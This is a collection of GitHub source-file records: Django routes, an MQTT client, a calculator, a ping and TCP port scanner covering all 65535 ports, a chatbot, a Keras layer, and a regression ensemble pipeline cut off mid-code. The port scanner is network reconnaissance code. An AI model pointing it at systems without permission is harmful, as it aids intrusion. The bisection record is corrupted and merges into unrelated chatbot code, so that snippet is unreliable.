+{"seq_id":"30131080496","text":"from django.urls import path\nfrom .views import index, sith_page, recruit_page, questions_page, siths, make_hand_of_shadow, hand_amount, more_than_one_hand\n\nurlpatterns = [\n path('', index, name='index'),\n path('sith', siths, name='sith'),\n path('recruit', recruit_page, name='recruit'),\n path('questions/', questions_page, name='questions'),\n path('sith/', sith_page, name='sith_page'),\n path('make_hand_of_shadow//', make_hand_of_shadow, name='make_hand_of_shadow'),\n path('hand_amount', hand_amount, name='hand_amount'),\n path('more_than_one_hand', more_than_one_hand, name='more_than_one_hand'),\n]\n","repo_name":"rishat11/star_wars","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71801312684","text":"import os\nimport time\nimport uuid\nimport datetime\nimport json\nfrom pprint import pprint\nimport paho.mqtt.client as mqtt\n\ndef msg_rcv(client, userdata, message):\n # print(\"Received message '\" + str(message.payload) + \"' on topic '\" + message.topic)\n try:\n data = json.loads(str(message.payload))\n print(data[\"date\"])\n except:\n print(\"A message not intended for me, ignoring... \"+ str(message.payload))\n\ndef on_log(client, userdata, level, buf):\n print(\"log: \",buf)\n\ndef main_loop():\n # mosquitto_sub -h 82.165.16.151 -t UCC/mark\n client = mqtt.Client(\"bje_client_\"+ str(uuid.UUID.hex))\n client.on_message = msg_rcv\n # client.on_log = on_log\n client.connect(\"test.mosquitto.org\") # , port=1883 , keepalive=60, bind_address=\"\"\n client.loop_start()\n client.subscribe(\"test_for_anna\")\n\n while True:\n time.sleep(1)\n print(\".\")\n\nif __name__ == \"__main__\":\n main_loop()","repo_name":"kittylyst/helloku-world","sub_path":"rcv.py","file_name":"rcv.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"26776819969","text":"import os\n\n# a little helper function for getting all dettected marker ids\n# from the reference image markers\ndef which(x, values):\n indices = []\n for ii in list(values):\n if ii in x:\n indices.append(list(x).index(ii))\n return indices\n\n\ndef get_camera_path(camera_name):\n\n stream = os.popen('v4l2-ctl --list-devices')\n output = stream.read()\n lines = output.split(\"\\n\")\n for i, line in enumerate(lines):\n if camera_name in line:\n return lines[i+1].strip()\n \n return \"\"","repo_name":"vietanhdev/paper_stream","sub_path":"libs/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"}
+{"seq_id":"73437640364","text":"import tkinter as tk\n\ndef calculate():\n num1 = float(entry_num1.get())\n num2 = float(entry_num2.get())\n operation = operation_var.get()\n \n if operation == \"Add\":\n result.set(num1 + num2)\n elif operation == \"Subtract\":\n result.set(num1 - num2)\n elif operation == \"Multiply\":\n result.set(num1 * num2)\n elif operation == \"Divide\":\n if num2 == 0:\n result.set(\"Cannot divide by zero\")\n else:\n result.set(num1 / num2)\n else:\n result.set(\"Please select a operation\")\n\n# Create the main window\nroot = tk.Tk()\nroot.title(\"Calculator\")\n\n# Create input fields and labels\nentry_num1 = tk.Entry(root)\nentry_num2 = tk.Entry(root)\nresult = tk.StringVar()\noperation_var = tk.StringVar()\noperation_var.set(\"Select Operation\")\n\nlabel_num1 = tk.Label(root, text=\"Enter first number:\")\nlabel_num2 = tk.Label(root, text=\"Enter second number:\")\nlabel_result = tk.Label(root, text=\"Result:\")\nlabel_operation = tk.Label(root, text=\"Select operation:\")\n\n# Create operation options\noperation_options = [\"Add\", \"Subtract\", \"Multiply\", \"Divide\"]\noption_menu = tk.OptionMenu(root, operation_var, *operation_options)\n\n# Create calculate button\ncalculate_button = tk.Button(root, text=\"Calculate\", command=calculate)\n\n# Grid layout\nlabel_num1.grid(row=0, column=0)\nentry_num1.grid(row=0, column=1)\nlabel_num2.grid(row=1, column=0)\nentry_num2.grid(row=1, column=1)\nlabel_operation.grid(row=2, column=0)\noption_menu.grid(row=2, column=1)\ncalculate_button.grid(row=3, column=0, columnspan=2)\nlabel_result.grid(row=4, column=0)\ntk.Label(root, textvariable=result).grid(row=4, column=1)\n\n# Start the GUI event loop\nroot.mainloop()\n","repo_name":"deepa-48/Calculator","sub_path":"simple_calculator.py","file_name":"simple_calculator.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"41366390049","text":"# -*- coding:utf8 -*-\n\nimport os\nimport time\nimport json\nimport argparse\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\n\nfrom utils import check_ping, parse_ip, check_port\n\n\nclass HostScanner(object):\n\n def __init__(self, args):\n self.m = args.m\n self.f = args.f\n self.file_name = args.w\n self.cost_print = args.v\n self.concurrent_num = args.n\n self.ip = [ip for ip in parse_ip(args.ip)] if args.f == 'ping' else args.ip\n\n def run_ping(self, ip):\n res = check_ping(ip)\n return {'ip': ip, 'can_ping': res}\n\n def run_tcp_port(self, port):\n res = check_port(self.ip, port)\n return {'ip': self.ip, 'port': port, 'is_open': res}\n\n def run(self):\n begin = int(time.time())\n Executer = ThreadPoolExecutor if args.m == 'thread' else ProcessPoolExecutor\n with Executer(self.concurrent_num) as pool:\n if self.f == 'ping':\n result = pool.map(self.run_ping, self.ip)\n else:\n result = pool.map(self.run_tcp_port, [port for port in range(65535 + 1)])\n end = int(time.time())\n\n if self.cost_print:\n print('cost time:%s' % (end - begin))\n data = list()\n for d in result:\n data.append(d)\n\n if self.file_name:\n with open(self.file_name, 'w') as f:\n f.write(json.dumps(data))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-m', type=str, choices=['proc', 'thread'], default='proc', help='多线程or多进程')\n parser.add_argument('-n', type=int, help='进程或线程数量')\n parser.add_argument('-f', choices=['tcp', 'ping'], default='ping', help='执行方式')\n parser.add_argument('-ip', metavar='ip', required=True, help='ip eg. 192.0.0.1 192.0.0.1-192.0.0.100')\n parser.add_argument('-w', metavar='filename', help='扫描结果保存文件')\n parser.add_argument('-v', action='store_true', help='打印扫描器运行耗时')\n args = parser.parse_args()\n host_scanner = HostScanner(args)\n host_scanner.run()\n","repo_name":"Masonnn/ApiTest","sub_path":"pythonYing/week03/homework/pmap02/app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"16108182961","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 23 12:38:13 2016\n\n@author: apple\n\"\"\"\nimport numpy as np\nimport time\nfrom numba import jit, f8, njit\nimport C_bisect as Cbi\n\ndef root_func(x,aa,kk):\n return x**4 + kk*x**2 + aa*x - 3\n \na = np.random.rand(50000)\nkk = np.random.randint(-2,50,size=a.shape).astype(np.float64)\nres = np.empty(a.size)\nres1 = np.empty(a.size)\nres2 = np.empty(a.size)\n\n\n# [0] python bisection\nt1 = time.time()\ndef python_bisect(a, b, aa, kk, tol, mxiter):\n its = 0\n fa = root_func(a, aa, kk)\n fb = root_func(b, aa, kk)\n if abs(fa) < tol:\n return a\n elif abs(fb) < tol:\n return b\n c = (a+b)/2.\n fc = root_func(c, aa, kk)\n while abs(fc)>tol and itstol and its 0.75:\n for intent in intents['intents']:\n if tag == intent[\"tag\"]:\n print(f\"{bot_name}: {(random.choice(intent['responses']))}\")\n else:\n print(f\"{bot_name}: Não entendi...\")","repo_name":"GO0108/sabia","sub_path":"Criando um ChatBot/Chatbot BoW/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"6038197722","text":"import urllib.parse\nfrom typing import Callable\n\nimport web_framework.server_side.infastructure.ids_manager as ids_manager\nfrom APIs.TalpiotAPIs.Gitlab.gitlab_file_tree import GitlabFileTree\nfrom web_framework.server_side.infastructure.constants import *\nfrom web_framework.server_side.infastructure.ui_component import UIComponent\n\n\nclass FileTree(UIComponent):\n def __init__(self, action: Callable = None, size=SIZE_MEDIUM, start_folder = 'bot_features', branch = 'development'):\n super().__init__(size=size)\n self.__action = None\n self.set_action(action)\n self.__files = GitlabFileTree.objects(name=start_folder, branch = branch).first()\n self.__files = self.__files.to_json() if self.__files is not None else {}\n\n def set_action(self, action: Callable):\n if action:\n func_id = ids_manager.gen_action_id(lambda json: action(json['url']))\n self.__action = self.method_to_url(func_id)\n\n def render(self):\n return {\n JSON_TYPE: 'FileTree',\n JSON_ID: self.id,\n JSON_ACTION: self.__action,\n JSON_SIZE: self.size,\n JSON_FILES: self.__files\n }\n","repo_name":"roeinath/Magdad","sub_path":"web_framework/server_side/infastructure/components/file_tree.py","file_name":"file_tree.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"72614305964","text":"#2244. Minimum Rounds to Complete All Tasks\ndef minimumRounds(self, tasks: list[int]) -> int:\n tasks.sort()\n fin = 0\n for i in range(0,len(tasks)):\n for j in range(i+1,len(tasks)):\n if tasks[j] != tasks[i]:\n break\n n = j-i-1\n print(n,tasks[i],tasks[j])\n if n%3 == 0:\n fin += n/3\n elif n > 2:\n fin += fun(n)\n elif n == 2:\n fin += 1\n elif n < 2 :\n return -1\n return fin\n\n\"\"\" amount = []\n fin = 0\n for i in r:\n amount.append(tasks.count(i))\n print(amount)\n for l in amount:\n if l < 2:\n return -1\n elif l%3 == 0:\n fin += l/3\n elif l > 2:\n fin += fun(l)\n elif l == 2:\n fin += 1\n return int(fin)\n\"\"\"\ndef fun(n):\n numb = int(n/3)\n for i in range(numb,-1,-1):\n if (n-i*3) %2 == 0:\n return i + (n-i*3)/2\n\n\n \n\nprint(minimumRounds(5,[2,2,3,3,2,4,4,4,4,4]))","repo_name":"leonado10000/CP","sub_path":"leetcode/2244. Minimum Rounds to Complete All Tas.py","file_name":"2244. Minimum Rounds to Complete All Tas.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"3268277726","text":"from tensorflow import keras\nfrom tensorflow.keras import backend as K\n\n__all__ = ['WeightedSum']\n\n\nclass WeightedSum(keras.layers.Layer):\n r\"\"\"Sum the layers with trainable weights. All the layers should have the same shape and mask.\n\n h = \\gamma * \\sum_{i=0}^L w_i h_i\n\n s will be normalized with softmax.\n \"\"\"\n\n def __init__(self,\n use_scaling=True,\n **kwargs):\n \"\"\"Initialize the layer.\n\n :param use_scaling: Whether to use the scaling term `gamma`.\n :param kwargs:\n \"\"\"\n self.supports_masking = True\n self.use_scaling = use_scaling\n self.gamma, self.w = None, None\n super(WeightedSum, self).__init__(**kwargs)\n\n def get_config(self):\n config = {\n 'use_scaling': self.use_scaling,\n }\n base_config = super(WeightedSum, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n def build(self, input_shape):\n if isinstance(input_shape, list):\n layer_num = len(input_shape)\n else:\n layer_num = 1\n if self.use_scaling:\n self.gamma = self.add_weight(shape=(1,),\n initializer='ones',\n name='%s_gamma' % self.name)\n self.w = self.add_weight(shape=(layer_num,),\n initializer='ones',\n name='%s_w' % self.name)\n super(WeightedSum, self).build(input_shape)\n\n def compute_output_shape(self, input_shape):\n if isinstance(input_shape, list):\n return input_shape[0]\n return input_shape\n\n def compute_mask(self, inputs, mask=None):\n if isinstance(mask, list):\n return mask[0]\n return mask\n\n def call(self, inputs, mask=None, **kwargs):\n e = K.exp(self.w - K.max(self.w))\n w = e / (K.sum(e) + K.epsilon())\n if not isinstance(inputs, list):\n inputs = [inputs]\n summed = w[0] * inputs[0]\n for i in range(1, len(inputs)):\n summed += w[i] * inputs[i]\n if self.use_scaling:\n summed *= self.gamma\n return summed\n","repo_name":"CyberZHG/keras-bi-lm","sub_path":"keras_bi_lm/weighted_sum.py","file_name":"weighted_sum.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"}
+{"seq_id":"72661126123","text":"import os, time, math\nimport random\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom .data_factory import DataFactory\nfrom .log_factory import LogFactory\nfrom .Normalizer import UnitGaussianNormalizer\nfrom .models.nnet_model import MyNNet\nfrom .utils import *\nfrom .bayes_optimization import Bayes_Optimization\nfrom sklearn.metrics import r2_score\nfrom sklearn.linear_model import LassoCV\nfrom bayes_opt import BayesianOptimization\n\nimport matplotlib.pyplot as plt\n\n\nclass CoreComponent:\n def __init__(self, model='lasso', imputer='knn', outlier='zscore', pca='pca', device='cuda'):\n self.root_path = os.path.abspath(os.curdir)\n self.data_path = os.path.join(self.root_path, 'data')\n print(\"The root path of our project: \", self.root_path)\n self.imputer = imputer\n self.outlier = outlier\n self.pca = pca\n self.device = device # choose with your preference\n\n self.model_name = 'lasso' if model is None else model # choose with your preference\n if self.model_name == 'lasso':\n self.train_model = LassoCV\n elif self.model_name == 'nnet':\n self.train_model = MyNNet(self)\n elif self.model_name == 'ridge':\n from sklearn.linear_model import RidgeCV\n self.train_model = RidgeCV\n else:\n self.train_model = None\n\n self.log_factory = LogFactory(self, log_to_disk=False)\n self.data_factory = DataFactory(self)\n self.full_normalizer = UnitGaussianNormalizer(self)\n self.y_normalizer = UnitGaussianNormalizer(self)\n self.bayes_optimization = Bayes_Optimization(self)\n\n self.full_X = None\n self.full_Y = None\n self.validation_X = None\n\n self.k_fold = 10\n self.train_percent = 0.99\n\n self.initialized = False\n\n def initialization(self):\n random.seed(0)\n self.log_factory.initialization()\n self.log_factory.InfoLog(sentences=\"Log Factory fully created\")\n\n self.data_factory.initialization()\n\n # 1. read data\n self.full_X = self.data_factory.read_dataset(os.path.join(self.data_path, \"X_train.csv\"))\n self.full_Y = self.data_factory.read_dataset(os.path.join(self.data_path, \"y_train.csv\"))\n self.validation_X = self.data_factory.read_dataset(os.path.join(self.data_path, \"X_test.csv\"))\n\n # 2. process X files together\n full_X_shape_0 = self.full_X.shape[0]\n validation_X_shape_0 = self.validation_X.shape[0]\n full_validation_X = np.concatenate((self.full_X, self.validation_X), axis=0)\n\n full_validation_X, self.full_Y = self.data_factory.process_dataset(full_validation_X, self.full_Y,\n impute_method=self.imputer,\n outlier_method=self.outlier)\n self.full_normalizer.initialization(full_validation_X)\n full_validation_X = self.full_normalizer.encode(full_validation_X)\n full_X_shape_0 = len(self.full_Y)\n full_validation_X, self.full_Y = self.data_factory.feature_selection(full_validation_X, self.full_Y,\n method=self.pca, rows_X=full_X_shape_0)\n self.log_factory.InfoLog(\"After feature selection, the shape of X = {}\".format(full_validation_X.shape))\n self.full_X = full_validation_X[:full_X_shape_0, :]\n self.validation_X = full_validation_X[-validation_X_shape_0:, :]\n\n # self.y_normalizer.initialization(self.full_Y)\n # self.full_Y = self.y_normalizer.encode(self.full_Y)\n\n # 3. transfer numpy data to Tensor data\n self.log_factory.InfoLog(\"Read data completed from X_train.csv, with shape as {}\".format(self.full_X.shape))\n self.full_X = torch.autograd.Variable(torch.from_numpy(np.array(self.full_X)).float()).to(self.device)\n # self.full_Y = self.data_factory.process_dataset(self.full_Y) # Y data cannot be processed!\n self.log_factory.InfoLog(\"Read data completed from y_train.csv, with shape as {}\".format(self.full_Y.shape))\n self.full_Y = torch.autograd.Variable(\n torch.from_numpy(np.array(self.full_Y).reshape(self.full_Y.shape[0], 1)).float()).to(self.device)\n\n self.log_factory.InfoLog(\n \"Read data completed from X_test.csv, with shape as {}\".format(self.validation_X.shape))\n self.validation_X = torch.autograd.Variable(torch.from_numpy(np.array(self.validation_X)).float()).to(\n self.device)\n\n self.initialized = True\n \n\n def run(self):\n if self.model_name == \"lasso\":\n full_X = self.full_X.cpu().numpy()\n full_Y = self.full_Y.cpu().numpy()\n reg = self.train_model(n_alphas=100, cv=self.k_fold, eps=1e-3, max_iter=5000, random_state=0,\n precompute=False).fit(full_X, full_Y)\n predicted_y_validate = reg.predict(self.validation_X.cpu().numpy())\n predicted_y_full = reg.predict(full_X)\n self.dump_validated_y(predicted_y_validate)\n self.log_factory.InfoLog(\"all score = {}\".format(r2_score(full_Y, predicted_y_full)))\n elif self.model_name == 'ridge':\n full_X = self.full_X.cpu().numpy()\n full_Y = self.full_Y.cpu().numpy()\n \"\"\"\n params: cv=k-fold //为None时使用loocv来验证,但是score会用mse而不是r2score\n alphas=[...] //里面是我们备选的所有正则化参数\n fit_intercept=True //default就是True,指在拟合时是否需要截距(当然需要)\n \"\"\"\n reg = self.train_model(alphas=[1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1, 10.0], cv=self.k_fold).fit(full_X, full_Y)\n predicted_y_validate = reg.predict(self.validation_X.cpu().numpy())\n predicted_y_full = reg.predict(full_X)\n self.dump_validated_y(predicted_y_validate.squeeze(1))\n self.log_factory.InfoLog(\"all score = {}\".format(r2_score(full_Y, predicted_y_full)))\n elif self.model_name == \"mlp\":\n from sklearn.ensemble import ExtraTreesRegressor\n from sklearn.model_selection import RandomizedSearchCV, GridSearchCV, cross_val_score\n #from sklearn.neural_network import MLPRegressor\n\n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n\n ###贝叶斯调参 \n #黑盒函数 \n def black_box_function(n_estimators, min_samples_split, max_features, max_depth, min_samples_leaf):\n val = cross_val_score(\n ExtraTreesRegressor(n_estimators = int(n_estimators),\n max_features = int(max_features),\n max_depth = int(max_depth),\n min_samples_split = int(min_samples_split),\n min_samples_leaf = int(min_samples_leaf),\n random_state = 2,\n bootstrap=True\n ),\n train_X, train_Y,scoring='r2', cv=5, n_jobs=-1\n ).mean()\n return val #max_features = max_features, # float\n \n #定义域\n pbounds= {'n_estimators': (500, 2000),\n 'max_features': (1, self.full_X.shape[1]),\n 'max_depth': (5, 150),\n 'min_samples_split': (2, 30),\n 'min_samples_leaf':(1, 20)}\n #'bootstrap': [True, False]\n #实例化对象\n optimizer = BayesianOptimization(f= black_box_function,\n pbounds= pbounds,\n verbose= 2, # verbose = 1 prints only when a maximum is observed, verbose = 0 is silent\n random_state= 1,\n )\n #确定迭代次数\n optimizer.maximize(init_points= 12, #执行随机搜索的步数\n n_iter= 100, #执行贝叶斯优化的步数\n )\n #输出最优结果\n print(optimizer.max)\n n_es=optimizer.max['params']['n_estimators']\n max_dep=optimizer.max['params']['max_depth']\n max_fea=optimizer.max['params']['max_features']\n min_s_l=optimizer.max['params']['min_samples_leaf']\n min_s_s=optimizer.max['params']['min_samples_split']\n \n # extra trees regression\n extra_tree = ExtraTreesRegressor(n_estimators=int(n_es),max_depth=int(max_dep), max_features=int(max_fea),\n min_samples_leaf=int(min_s_l), min_samples_split=int(min_s_s), n_jobs=-1,bootstrap=True)\n extra_tree.fit(train_X, train_Y)\n extra_pred = extra_tree.predict(val_X)\n\n self.log_factory.InfoLog(\"The score of extra_tree for validation={}\".format(r2_score(val_Y, extra_pred)))\n \n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': extra_pred})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(extra_tree.predict(self.validation_X.cpu().numpy()))\n \n elif self.model_name == \"adaboost\":\n from sklearn import ensemble \n from sklearn.tree import DecisionTreeRegressor \n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n \n print('Bayes_Optimization(adaboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_Adaboost(train_X = train_X, train_Y = train_Y) \n Adaboost = ensemble.AdaBoostRegressor(\n DecisionTreeRegressor( max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s,min_samples_leaf = min_s_l, random_state = 2),\n n_estimators = n_es,learning_rate = l_ra)\n \n Adaboost.fit(train_X, train_Y)\n ada_pred = Adaboost.predict(val_X)\n\n self.log_factory.InfoLog(\"The score of Adaboost for validation={}\".format(r2_score(val_Y, ada_pred)))\n \n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': ada_pred})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(Adaboost.predict(self.validation_X.cpu().numpy()))\n \n elif self.model_name == \"Gboost\":\n from sklearn import ensemble \n model_GradientBoostingRegressor = ensemble.GradientBoostingRegressor()\n \n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n \n #Gboost\n print('Bayes_Optimization(Gboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s = self.bayes_optimization.Bayes_opt_GBoost(train_X = train_X, train_Y = train_Y) \n Gboost = ensemble.GradientBoostingRegressor(max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s, min_samples_leaf = min_s_l, random_state = 2,\n n_estimators = n_es, learning_rate = l_ra, loss='huber')\n\n Gboost.fit(train_X, train_Y)\n gbt_pred = Gboost.predict(val_X)\n \n self.log_factory.InfoLog(\"The score of Adaboost for validation={}\".format(r2_score(val_Y, gbt_pred)))\n \n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': gbt_pred})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(Gboost.predict(self.validation_X.cpu().numpy()))\n \n elif self.model_name == \"ensemble\":\n from sklearn.model_selection import KFold, GridSearchCV\n \n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n \n score_function = r2_score\n\n # =============Add different models here!!!!=============\n model_heads = []\n models = []\n from sklearn import tree # 0\n model_DecisionTreeRegressor = tree.DecisionTreeRegressor()\n model_heads.append(\"Decision Tree Regression\\t\\t\")\n models.append(model_DecisionTreeRegressor)\n \n from sklearn import linear_model # 1\n model_LinearRegression = linear_model.LinearRegression()\n model_heads.append(\"Linear Regression\\t\\t\\t\\t\")\n models.append(model_LinearRegression)\n \n from sklearn import svm # 2\n model_SVR = svm.SVR()\n model_heads.append(\"Support Vector Machine Regression\")\n models.append(model_SVR)\n \n from sklearn import neighbors # 3\n model_KNeighborsRegressor = neighbors.KNeighborsRegressor()\n model_heads.append(\"K-Nearest Neighbor Regression\\t\")\n models.append(model_KNeighborsRegressor)\n \n from sklearn import ensemble # 4\n model_RandomForestRegressor = ensemble.RandomForestRegressor(n_estimators=20)\n model_heads.append(\"Random Forest Regression\\t\\t\")\n models.append(model_RandomForestRegressor)\n \n from sklearn import ensemble # 5\n model_AdaBoostRegressor = ensemble.AdaBoostRegressor(n_estimators=150)\n model_heads.append(\"AdaBoost Regression\\t\\t\\t\\t\")\n models.append(model_AdaBoostRegressor)\n \n from sklearn import ensemble # 6\n model_GradientBoostingRegressor = ensemble.GradientBoostingRegressor()\n model_heads.append(\"Gradient Boosting Regression\\t\")\n models.append(model_GradientBoostingRegressor)\n \n from sklearn.ensemble import BaggingRegressor # 7\n model_BaggingRegressor = BaggingRegressor()\n model_heads.append(\"Bagging Regression\\t\\t\\t\\t\")\n models.append(model_BaggingRegressor)\n \n from sklearn.tree import ExtraTreeRegressor # 8\n model_ExtraTreeRegressor = ExtraTreeRegressor()\n model_heads.append(\"ExtraTree Regression\\t\\t\\t\")\n models.append(model_ExtraTreeRegressor)\n \n import xgboost as xgb # 9\n # params = {'learning_rate': 0.1, 'n_estimators': 400, 'max_depth': 8, 'min_child_weight': 2, 'seed': 0,\n # 'subsample': 0.8, 'colsample_bytree': 0.8, 'gamma': 0.2, 'reg_alpha': 3, 'reg_lambda': 2}\n model_XGBoostRegressor = xgb.XGBRegressor()\n model_heads.append(\"XGBoost Regression\\t\\t\\t\\t\")\n models.append(model_XGBoostRegressor)\n # =============Model Adding Ends=============\n \n # =============For Esemble and Stacking =============\n from sklearn.linear_model import ElasticNet, Lasso, BayesianRidge, LassoLarsIC\n from sklearn.kernel_ridge import KernelRidge\n from sklearn.pipeline import make_pipeline\n from sklearn.preprocessing import RobustScaler\n from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone\n from sklearn.model_selection import KFold\n import xgboost as xgb\n import lightgbm as lgb\n from sklearn import linear_model\n from sklearn.tree import DecisionTreeRegressor \n from sklearn.ensemble import ExtraTreesRegressor\n\n\n \n #原组合:Enet+KRR+GBoost+lasso(meta)+xgb+lgb\n #新组合:adaboost+RandomForest+GBoost+lasso(meta)+xgb+lgb\n '''\n #lasso\n print('Bayes_Optimization(lasso)')\n alp = self.bayes_optimization.Bayes_opt_lasso(train_X = train_X, train_Y = train_Y)\n lasso = make_pipeline(RobustScaler(), Lasso(alpha = alp, random_state=1))\n #lasso = make_pipeline(RobustScaler(), Lasso(alpha =0.0005, random_state=1))\n '''\n #extra_tree\n print('Bayes_Optimization(extra_tree)')\n n_es, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_extratree(train_X = train_X, train_Y = train_Y) \n extra_tree = ExtraTreesRegressor(n_estimators=int(n_es),max_depth=int(max_dep), max_features=int(max_fea),\n min_samples_leaf=int(min_s_l), min_samples_split=int(min_s_s), n_jobs=-1,bootstrap=True)\n #adaboost\n print('Bayes_Optimization(adaboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_Adaboost(train_X = train_X, train_Y = train_Y) \n Adaboost = ensemble.AdaBoostRegressor(\n DecisionTreeRegressor( max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s,min_samples_leaf = min_s_l, random_state = 2),\n n_estimators = n_es,learning_rate = l_ra)\n #RandomForest\n print('Bayes_Optimization(RandomForest)')\n n_es, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_RandomForest(train_X = train_X, train_Y = train_Y) \n RandomForest = ensemble.RandomForestRegressor(n_estimators = n_es,\n max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s, min_samples_leaf = min_s_l, \n random_state = 2)\n #Gboost\n print('Bayes_Optimization(Gboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s = self.bayes_optimization.Bayes_opt_GBoost(train_X = train_X, train_Y = train_Y) \n Gboost = ensemble.GradientBoostingRegressor(max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s, min_samples_leaf = min_s_l, random_state = 2,\n n_estimators = n_es, learning_rate = l_ra, loss='huber')\n #xgb\n model_xgb = xgb.XGBRegressor(colsample_bytree=0.4603, gamma=0.0468,\n learning_rate=0.05, max_depth=3,\n min_child_weight=1.7817, n_estimators=2200,\n reg_alpha=0.4640, reg_lambda=0.8571,\n subsample=0.5213, silent=1,\n random_state =7, nthread = -1)\n #lgb\n model_lgb = lgb.LGBMRegressor(objective='regression',num_leaves=5,\n learning_rate=0.05, n_estimators=720,\n max_bin = 55, bagging_fraction = 0.8,\n bagging_freq = 5, feature_fraction = 0.2319,\n feature_fraction_seed=9, bagging_seed=9,\n min_data_in_leaf =6, min_sum_hessian_in_leaf = 11)\n \n \n def get_model_score(model, x_all, y_all, n_folds=5):\n #交叉验证求r2_score\n score_func = r2_score\n kf = KFold(n_splits=n_folds, shuffle=True)\n score_mean_test = 0\n score_mean_train = 0\n for train_idx, test_idx in kf.split(x_all):\n x_train = x_all[train_idx]\n y_train = y_all[train_idx]\n x_test = x_all[test_idx]\n y_test = y_all[test_idx]\n score_test, score_train = try_different_method(model, x_train, y_train, x_test, y_test, score_func)\n score_mean_test += score_test\n score_mean_train += score_train\n score_mean_test /= n_folds\n score_mean_train /= n_folds\n return score_mean_test\n \n \n def try_different_method(model, x_train, y_train, x_test, y_test, score_func):\n #求模型分数\n \"\"\"\n Inner function in train_evaluate_return_best_model for model training.\n :param model: one specific model\n :param x_train:\n :param y_train:\n :param x_test:\n :param y_test:\n :param score_func:\n :return score:\n \"\"\"\n model.fit(x_train, y_train)\n result_test = model.predict(x_test)\n result_train = model.predict(x_train)\n return score_func(y_test, result_test), score_func(y_train, result_train)\n \n \n class StackingAveragedModels(BaseEstimator, RegressorMixin, TransformerMixin):\n #定义StackingAveragedModels\n \"\"\"\n from https://www.kaggle.com/serigne/stacked-regressions-top-4-on-leaderboard\n \"\"\"\n def __init__(self, base_models, meta_model, n_folds=5):\n self.base_models = base_models\n self.meta_model = meta_model\n self.n_folds = n_folds\n \n # We again fit the data on clones of the original models\n def fit(self, 